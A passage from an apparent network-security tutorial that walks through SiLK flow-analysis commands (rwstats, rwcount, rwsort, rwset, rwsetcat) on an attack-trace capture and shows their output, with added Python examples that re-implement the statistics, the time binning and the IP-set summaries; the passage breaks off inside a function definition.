<span style="color: white;">OUTPUT: Top 5 Bins by Records</span>
<span style="color: white;">pro| Records| %Records| cumul_%|</span>
<span style="color: white;"> 17| 886| 88.600000| 88.600000|</span>
<span style="color: white;"> 6| 109| 10.900000| 99.500000|</span>
<span style="color: white;"> 1| 3| 0.300000| 99.800000|</span>
<span style="color: white;"> 58| 2| 0.200000|100.000000|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get the overall statistics via the summary parameter <i>--overall-stats</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --overall-stats | more</span></b></span>
<span style="color: white;">FLOW STATISTICS--ALL PROTOCOLS: 12 records</span>
<span style="color: white;">*BYTES min 40; max 165088</span>
<span style="color: white;"> quartiles LQ 150.00000 Med 504.00000 UQ 4000.00000 UQ-LQ 3850.00000</span>
<span style="color: white;"> interval_max|count<=max|%_of_input| cumul_%|</span>
<span style="color: white;"> 40| 1| 8.333333| 8.333333|</span>
<span style="color: white;"> 60| 1| 8.333333| 16.666667|</span>
<span style="color: white;"> 100| 0| 0.000000| 16.666667|</span>
<span style="color: white;"> 150| 1| 8.333333| 25.000000|</span>
<span style="color: white;"> 256| 2| 16.666667| 41.666667|</span>
<span style="color: white;"> 1000| 3| 25.000000| 66.666667|</span>
<span style="color: white;"> 10000| 3| 25.000000| 91.666667|</span>
<span style="color: white;"> 100000| 0| 0.000000| 91.666667|</span>
<span style="color: white;"> 1000000| 1| 8.333333|100.000000|</span>
<span style="color: white;"> 4294967295| 0| 0.000000|100.000000|</span>
<span style="color: white;">*PACKETS min 1; max 159</span>
<span style="color: white;"> quartiles LQ 3.00000 Med 10.00000 UQ 17.50000 UQ-LQ 14.50000</span>
<span style="color: white;"> interval_max|count<=max|%_of_input| cumul_%|</span>
<span style="color: white;"> 3| 3| 25.000000| 25.000000|</span>
<span style="color: white;"> 4| 1| 8.333333| 33.333333|</span>
<span style="color: white;"> 10| 2| 16.666667| 50.000000|</span>
<span style="color: white;"> 20| 4| 33.333333| 83.333333|</span>
<span style="color: white;"> 50| 0| 0.000000| 83.333333|</span>
<span style="color: white;"> 100| 0| 0.000000| 83.333333|</span>
<span style="color: white;"> 500| 2| 16.666667|100.000000|</span>
<span style="color: white;"> 1000| 0| 0.000000|100.000000|</span>
<span style="color: white;"> 10000| 0| 0.000000|100.000000|</span>
<span style="color: white;"> 4294967295| 0| 0.000000|100.000000|</span>
</pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">...</span></pre></td></tr></tbody></table></div>
<p></p><p>Look at the top 5 by bytes, this time including the "distinct"/unique source and destination IPs.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --count=5 --fields=bytes --values=bytes,distinct:sip,dip</span></b></span>
<span style="color: white;">INPUT: 12 Records for 12 Bins and 178561 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> bytes| Bytes| sIP-Distinct| dIP-Distinct| %Bytes| cumul_%|</span>
<span style="color: white;"> 165088| 165088| 1| 1| 92.454679| 92.454679|</span>
<span style="color: white;"> 4777| 4777| 1| 1| 2.675276| 95.129956|</span>
<span style="color: white;"> 4488| 4488| 1| 1| 2.513427| 97.643382|</span>
<span style="color: white;"> 1590| 1590| 1| 1| 0.890452| 98.533834|</span>
<span style="color: white;"> 801| 801| 1| 1| 0.448586| 98.982421|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Set a threshold for the number of records that must be found before a flow can be reported.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --threshold=6 --fields=sIP</span></b></span>
<span style="color: white;">INPUT: 12 Records for 2 Bins and 12 Total Records</span>
<span style="color: white;">OUTPUT: Top 2 bins by Records (threshold 6)</span>
<span style="color: white;"> sIP| Records| %Records| cumul_%|</span>
<span style="color: white;"> 98.114.205.102| 6| 50.000000| 50.000000|</span>
<span style="color: white;"> 192.150.11.111| 6| 50.000000|100.000000|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Set the threshold for the number of bytes that must be matched to 1500.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --threshold=1500 --fields=sIP --values=bytes</span></b></span>
<span style="color: white;">INPUT: 12 Records for 2 Bins and 178561 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 2 bins by Bytes (threshold 1500)</span>
<span style="color: white;"> sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 98.114.205.102| 171264| 95.913441| 95.913441|</span>
<span style="color: white;"> 192.150.11.111| 7297| 4.086559|100.000000|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Both records above match that criterion. Let's change this to a threshold of 7298 to get just one record.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --threshold=7298 --fields=sIP --values=bytes</span></b></span>
<span style="color: white;">INPUT: 12 Records for 2 Bins and 178561 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 1 bins by Bytes (threshold 7298)</span>
<span style="color: white;"> sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 98.114.205.102| 171264| 95.913441| 95.913441|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>The above shows that, with our threshold, only one record was returned. Next, remove the two rightmost columns, the percentage fields, with <i>--no-percents</i>.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --threshold=7298 --fields=sIP \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--values=bytes --no-percents</span></b></span>
<span style="color: white;">INPUT: 12 Records for 2 Bins and 178561 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 1 bins by Bytes (threshold 7298)</span>
<span style="color: white;"> sIP| Bytes|</span>
<span style="color: white;"> 98.114.205.102| 171264|</span>
</pre></td></tr></tbody></table></div>
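<p>To make the <i>--bin-time</i>, <i>--values</i>, <i>--count</i> and <i>--threshold</i> behaviour of <b>rwuniq</b> and <b>rwstats</b> concrete, here is an added Python example (not SiLK code, and not from the original post) that re-implements that grouping over the CSV layout <b>rwcut</b> produces with <i>--delimited=,</i>. The sample records and the extra <i>packets</i> column are constructed for the demo; bins are aligned to the Unix epoch, which is why 03:28:xx with a 600-second bin lands in 03:20:00 as in the output above.</p>

```python
"""rwuniq/rwstats-style time binning over rwcut CSV output (added example)."""
from collections import defaultdict
from datetime import datetime, timezone
import csv
import io

# Constructed sample in rwcut --delimited=, layout (not real capture data);
# a packets column has been added so that --values=packets can be shown.
SAMPLE_CSV = """\
sIP,sPort,dIP,dPort,bytes,packets,sTime
98.114.205.102,1821,192.150.11.111,445,168,4,2019/04/20T03:28:28.374
192.150.11.111,445,98.114.205.102,1821,128,3,2019/04/20T03:28:28.375
98.114.205.102,1828,192.150.11.111,445,4777,14,2019/04/20T03:28:29.101
192.150.11.111,445,98.114.205.102,1828,1590,17,2019/04/20T03:28:29.102
98.114.205.102,1924,192.150.11.111,1957,165088,159,2019/04/20T03:28:41.500
192.150.11.111,1957,98.114.205.102,1924,801,9,2019/04/20T03:28:41.501
"""

TIME_FMT = "%Y/%m/%dT%H:%M:%S.%f"  # rwcut's default sTime rendering


def parse_rwcut_csv(text):
    """Parse rwcut CSV (--delimited=,) into typed records with UTC timestamps."""
    records = []
    for row in csv.DictReader(io.StringIO(text)):
        stime = datetime.strptime(row["sTime"], TIME_FMT).replace(tzinfo=timezone.utc)
        records.append({
            "sip": row["sIP"], "sport": int(row["sPort"]),
            "dip": row["dIP"], "dport": int(row["dPort"]),
            "bytes": int(row["bytes"]), "packets": int(row["packets"]),
            "stime": stime,
        })
    return records


def bin_start(stime, bin_seconds):
    """Floor a timestamp to a bin boundary aligned to the Unix epoch.

    This is what --bin-time does: 03:28:28 with --bin-time=600 -> 03:20:00.
    """
    epoch = int(stime.timestamp())
    return datetime.fromtimestamp(epoch - epoch % bin_seconds, tz=timezone.utc)


def rwuniq_like(records, fields, values=("records",), bin_time=None):
    """Group records by `fields` and aggregate `values`, like rwuniq.

    Supported values: records, bytes, packets, distinct:sip, distinct:dip.
    Each record is placed whole into the bin containing its start time
    (rwcount, by contrast, spreads a flow across bins, hence its fractions).
    Returns {key_tuple: {value_name: number}}.
    """
    bins = defaultdict(lambda: {"records": 0, "bytes": 0, "packets": 0,
                                "distinct:sip": set(), "distinct:dip": set()})
    for rec in records:
        key = tuple(bin_start(rec["stime"], bin_time) if f == "stime" and bin_time
                    else rec[f] for f in fields)
        b = bins[key]
        b["records"] += 1
        b["bytes"] += rec["bytes"]
        b["packets"] += rec["packets"]
        b["distinct:sip"].add(rec["sip"])
        b["distinct:dip"].add(rec["dip"])
    return {key: {v: (len(b[v]) if v.startswith("distinct:") else b[v]) for v in values}
            for key, b in bins.items()}


def rwstats_like(records, fields, value="bytes", count=None, threshold=None, bin_time=None):
    """Rank bins by `value` with %value and cumul_% columns, like rwstats.

    Exactly one of count (Top N) or threshold (keep bins with value >= N)
    applies, mirroring the --count / --threshold switches.  Percentages are
    relative to the whole input, so a threshold-trimmed list need not reach 100%.
    """
    if (count is None) == (threshold is None):
        raise ValueError("specify exactly one of count or threshold")
    bins = rwuniq_like(records, fields, values=(value,), bin_time=bin_time)
    total = sum(b[value] for b in bins.values())
    ranked = sorted(bins.items(), key=lambda kv: kv[1][value], reverse=True)
    ranked = ranked[:count] if count is not None else [kv for kv in ranked if kv[1][value] >= threshold]
    rows, cumul = [], 0.0
    for key, b in ranked:
        pct = 100.0 * b[value] / total if total else 0.0
        cumul += pct
        rows.append({"key": key, value: b[value], "pct": pct, "cumul_pct": cumul})
    return rows


if __name__ == "__main__":
    recs = parse_rwcut_csv(SAMPLE_CSV)
    # Equivalent of: rwuniq --fields stime,sip --values=bytes,packets --bin-time=600
    for key, agg in rwuniq_like(recs, ("stime", "sip"), ("bytes", "packets"), bin_time=600).items():
        print(key[0].strftime("%Y/%m/%dT%H:%M:%S"), key[1], agg)
    # Equivalent of: rwstats --fields=sIP --values=bytes --threshold=7298
    for row in rwstats_like(recs, ("sip",), "bytes", threshold=7298):
        print(row)
```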
<p></p><p>Characterizing traffic by time: view records in 20-second buckets with <b><i>rwcount</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcount attack-trace.rw --bin-size=20</span></b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2019/04/20T03:28:20| 8.26| 100551.36| 212.18|</span>
<span style="color: white;">2019/04/20T03:28:40| 3.74| 78009.64| 135.82|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>The <b>rwcount</b> default bin size is 30 seconds.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcount attack-trace.rw</span></b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2019/04/20T03:28:00| 2.60| 2218.09| 16.36|</span>
<span style="color: white;">2019/04/20T03:28:30| 9.40| 176342.91| 331.64|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>You can skip bins with zero bytes, flows or packets by using <i>--skip-zeroes</i>. I don't have any 0s below. At the same time, I've changed the <i>--bin-size</i> to 20 seconds rather than the default 30.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcount attack-trace.rw --bin-size=20 --skip-zeroes</span></b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2019/04/20T03:28:20| 8.26| 100551.36| 212.18|</span>
<span style="color: white;">2019/04/20T03:28:40| 3.74| 78009.64| 135.82|</span>
</pre></td></tr></tbody></table></div>
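<p>The fractional Records, Bytes and Packets in the rwcount output above come from the way a flow that straddles a bin boundary is split between bins. The following is an added example, not code from the original post or from the SiLK tools: it bins constructed flow records into time buckets, spreading each flow's volume over the bins its lifetime spans in proportion to the time spent in each bin (assumed here to match rwcount's default load scheme), and models <i>--skip-zeroes</i> with the <i>skip_zeroes</i> flag.</p>

```python
from collections import defaultdict
from datetime import datetime, timezone


def at(hour, minute, second):
    """Helper: a UTC timestamp on the day of the post's attack-trace.rw data."""
    return datetime(2019, 4, 20, hour, minute, second, tzinfo=timezone.utc)


# Constructed sample flows (not taken from attack-trace.rw):
# (start time, duration in seconds, bytes, packets)
SAMPLE_FLOWS = [
    (at(3, 28, 25), 10.0, 1000, 10),  # lies wholly inside the 03:28:20 bin
    (at(3, 28, 30), 20.0, 4000, 40),  # straddles the 03:28:20 / 03:28:40 boundary
    (at(3, 28, 45), 0.0, 52, 1),      # zero-duration, single-packet flow
    (at(3, 28, 55), 10.0, 200, 4),    # straddles the 03:28:40 / 03:29:00 boundary
    (at(3, 29, 45), 5.0, 300, 3),     # leaves the 03:29:20 bin empty
]


def bin_flows(flows, bin_size=30, skip_zeroes=False):
    """Return rows of (bin label, records, bytes, packets), rwcount style.

    A flow's volume is spread over the bins it spans in proportion to the
    time spent in each bin (assumed to match rwcount's default load scheme),
    so a flow straddling a boundary contributes a fraction of a record to
    each side. A zero-duration flow goes entirely to the bin holding its
    start. Bins are aligned to multiples of bin_size since the Unix epoch,
    which is why 20-second bins start at :00, :20 and :40.
    """
    totals = defaultdict(lambda: [0.0, 0.0, 0.0])
    for start, duration, nbytes, packets in flows:
        start_s = start.timestamp()
        end_s = start_s + duration
        first_bin = int(start_s // bin_size) * bin_size
        if duration <= 0:
            slices = [(first_bin, 1.0)]
        else:
            slices, b = [], first_bin
            while b < end_s:
                overlap = min(end_s, b + bin_size) - max(start_s, b)
                slices.append((b, overlap / duration))
                b += bin_size
        for b, fraction in slices:
            acc = totals[b]
            acc[0] += fraction
            acc[1] += fraction * nbytes
            acc[2] += fraction * packets
    if not totals:
        return []
    # rwcount prints every bin between the first and the last, including
    # empty ones, unless --skip-zeroes is given.
    rows, b = [], min(totals)
    while b <= max(totals):
        records, byte_count, packet_count = totals.get(b, (0.0, 0.0, 0.0))
        if not (skip_zeroes and records == 0.0):
            label = datetime.fromtimestamp(b, tz=timezone.utc).strftime("%Y/%m/%dT%H:%M:%S")
            rows.append((label, records, byte_count, packet_count))
        b += bin_size
    return rows


def print_rwcount(rows):
    """Print rows in the pipe-delimited layout rwcount uses."""
    print(f"{'Date':>20}|{'Records':>10}|{'Bytes':>15}|{'Packets':>10}|")
    for label, records, byte_count, packet_count in rows:
        print(f"{label:>20}|{records:10.2f}|{byte_count:15.2f}|{packet_count:10.2f}|")


if __name__ == "__main__":
    print_rwcount(bin_flows(SAMPLE_FLOWS, bin_size=20))
    print()
    print_rwcount(bin_flows(SAMPLE_FLOWS, bin_size=20, skip_zeroes=True))
```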
<p></p><p>Reverse sort all records by destination IP, protocol and bytes. <b><i>rwsort </i></b>produces binary output that cannot be written to the screen, hence the pipe to <b><i>rwcut</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsort attack-trace.rw --fields=dip,protocol,bytes \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--reverse | rwcut --fields=dip,protocol,bytes,stime \</span></b></span>
<span><b><span style="color: #fcff01;">--num-recs=10 --ipv6-policy=ignore</span></b></span>
<span style="color: white;"> dIP|pro| bytes| sTime|</span>
<span style="color: white;"> 192.150.11.111| 6| 165088|2019/04/20T03:28:34.516|</span>
<span style="color: white;"> 192.150.11.111| 6| 4777|2019/04/20T03:28:28.509|</span>
<span style="color: white;"> 192.150.11.111| 6| 798|2019/04/20T03:28:33.576|</span>
<span style="color: white;"> 192.150.11.111| 6| 381|2019/04/20T03:28:30.466|</span>
<span style="color: white;"> 192.150.11.111| 6| 168|2019/04/20T03:28:28.374|</span>
<span style="color: white;"> 192.150.11.111| 6| 52|2019/04/20T03:28:44.593|</span>
<span style="color: white;"> 98.114.205.102| 6| 4488|2019/04/20T03:28:34.517|</span>
<span style="color: white;"> 98.114.205.102| 6| 1590|2019/04/20T03:28:28.509|</span>
<span style="color: white;"> 98.114.205.102| 6| 801|2019/04/20T03:28:33.457|</span>
<span style="color: white;"> 98.114.205.102| 6| 250|2019/04/20T03:28:30.466|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Perform the reverse sort based on the bytes.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsort attack-trace.rw --fields=bytes,dip,protocol --reverse | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwcut --fields=dip,protocol,bytes,stime --num-recs=10 --ipv6-policy=ignore</b></span>
<span style="color: white;"> dIP|pro| bytes| sTime|</span>
<span style="color: white;"> 192.150.11.111| 6| 165088|2019/04/20T03:28:34.516|</span>
<span style="color: white;"> 192.150.11.111| 6| 4777|2019/04/20T03:28:28.509|</span>
<span style="color: white;"> 98.114.205.102| 6| 4488|2019/04/20T03:28:34.517|</span>
<span style="color: white;"> 98.114.205.102| 6| 1590|2019/04/20T03:28:28.509|</span>
<span style="color: white;"> 98.114.205.102| 6| 801|2019/04/20T03:28:33.457|</span>
<span style="color: white;"> 192.150.11.111| 6| 798|2019/04/20T03:28:33.576|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Create a set of IP addresses from flow data using a combination of <b><i>rwfilter </i></b>and <b><i>rwset</i></b>. This can be used to export addresses from flow data and import them into other security tools such as a SIEM, firewall, etc.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --type=all --pass=stdout --proto=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--start-date=2022/04/1T00 --end-date=2022/04/04 --bytes-per-packet=70 \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--max-pass=100 | rwset --any-file=ip_from_flow.set</b></span>
</pre></td></tr></tbody></table></div>
<p></p><p>Validate the exported records by leveraging <b><i>rwsetcat</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetcat ip_from_flow.set</span></b></span>
<span style="color: white;">8.8.8.8</span>
<span style="color: white;">18.118.192.126</span>
<span style="color: white;">34.193.254.175</span>
<span style="color: white;">35.168.220.189</span>
<span style="color: white;">172.28.10.137</span>
<span style="color: white;">172.28.30.2</span>
<span style="color: white;">172.28.50.2</span>
<span style="color: white;">192.225.158.1</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Reverse this process using <b><i>rwsetbuild</i></b>: create a set of IPs from a text file. This can be used to ignore future flows via an allow/permit list.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetbuild --ip-ranges ip.txt ip.set</span></b></span>
</pre></td></tr></tbody></table></div>
<p></p><p>Read the created set via <b><i>rwsetcat</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetcat ip.set</span></b></span>
<span style="color: white;">1.1.1.1</span>
<span style="color: white;">2.2.2.2</span>
<span style="color: white;">3.3.3.3</span>
<span style="color: white;">4.4.4.4</span>
<span style="color: white;">5.5.5.5</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get statistics on the IP addresses in the set.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetcat --print-statistics ip.set</span></b></span>
<span style="color: white;">Network Summary</span>
<span style="color: white;"> minimumIP = 1.1.1.1</span>
<span style="color: white;"> maximumIP = 5.5.5.5</span>
<span style="color: white;"> 5 hosts (/32s), 0.000000% of 2^32</span>
<span style="color: white;"> 5 occupied /8s, 1.953125% of 2^8</span>
<span style="color: white;"> 5 occupied /16s, 0.007629% of 2^16</span>
<span style="color: white;"> 5 occupied /24s, 0.000030% of 2^24</span>
<span style="color: white;"> 5 occupied /27s, 0.000004% of 2^27</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get a snapshot view of the network structure with <b><i>rwsetcat</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetcat ip.set --network-structure</span></b></span>
<span style="color: white;">TOTAL| 5 hosts in 5 /8s, 5 /16s, 5 /24s, and 5 /27s</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get a different view of the network structure with <b><i>rwsetcat</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetcat ip.set --network-structure=24</span></b></span>
<span style="color: white;"> 1.1.1.0/24| 1</span>
<span style="color: white;"> 2.2.2.0/24| 1</span>
<span style="color: white;"> 3.3.3.0/24| 1</span>
<span style="color: white;"> 4.4.4.0/24| 1</span>
<span style="color: white;"> 5.5.5.0/24| 1</span>
</pre></td></tr></tbody></table></div>
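<p>The summary lines printed by <b><i>rwsetcat</i></b> <i>--print-statistics</i> and <i>--network-structure</i> above are easy to recompute, which is a useful check before handing an IP set to another tool. The following is an added example, not code from the original post or from SiLK: it computes the occupied /8, /16, /24 and /27 blocks for the five-host set shown above, plus a second constructed set whose hosts share prefixes, using Python's ipaddress module.</p>

```python
import ipaddress
from collections import Counter

# The five hosts from the post's ip.set, plus a constructed set whose hosts
# share prefixes, so that aggregation per block is visible.
SAMPLE_IPS = ["1.1.1.1", "2.2.2.2", "3.3.3.3", "4.4.4.4", "5.5.5.5"]
CLUSTERED_IPS = ["10.0.0.1", "10.0.0.2", "10.0.1.7", "10.0.0.200"]


def _hosts(ips):
    """Parse and sort IPv4 addresses given as strings or address objects."""
    return sorted(ipaddress.ip_address(str(ip)) for ip in ips)


def occupied_blocks(ips, prefix):
    """Distinct /prefix networks that contain at least one host of the set."""
    return {ipaddress.ip_network(f"{ip}/{prefix}", strict=False) for ip in _hosts(ips)}


def set_statistics(ips):
    """The numbers behind rwsetcat --print-statistics."""
    hosts = _hosts(ips)
    return {
        "min": str(hosts[0]),
        "max": str(hosts[-1]),
        "hosts": len(hosts),
        "occupied": {p: len(occupied_blocks(hosts, p)) for p in (8, 16, 24, 27)},
    }


def format_statistics(stats):
    """Render set_statistics() in the layout rwsetcat --print-statistics uses."""
    lines = [
        "Network Summary",
        f"  minimumIP = {stats['min']}",
        f"  maximumIP = {stats['max']}",
        f"  {stats['hosts']} hosts (/32s), {100 * stats['hosts'] / 2**32:.6f}% of 2^32",
    ]
    for prefix, n in stats["occupied"].items():
        # Percentage of all possible /prefix blocks that hold at least one host.
        lines.append(f"  {n} occupied /{prefix}s, {100 * n / 2**prefix:.6f}% of 2^{prefix}")
    return lines


def structure_total(ips):
    """The TOTAL line printed by rwsetcat --network-structure."""
    stats = set_statistics(ips)
    o = stats["occupied"]
    return (f"TOTAL| {stats['hosts']} hosts in {o[8]} /8s, {o[16]} /16s, "
            f"{o[24]} /24s, and {o[27]} /27s")


def network_structure(ips, prefix=24):
    """Host count per /prefix block, like rwsetcat --network-structure=PREFIX."""
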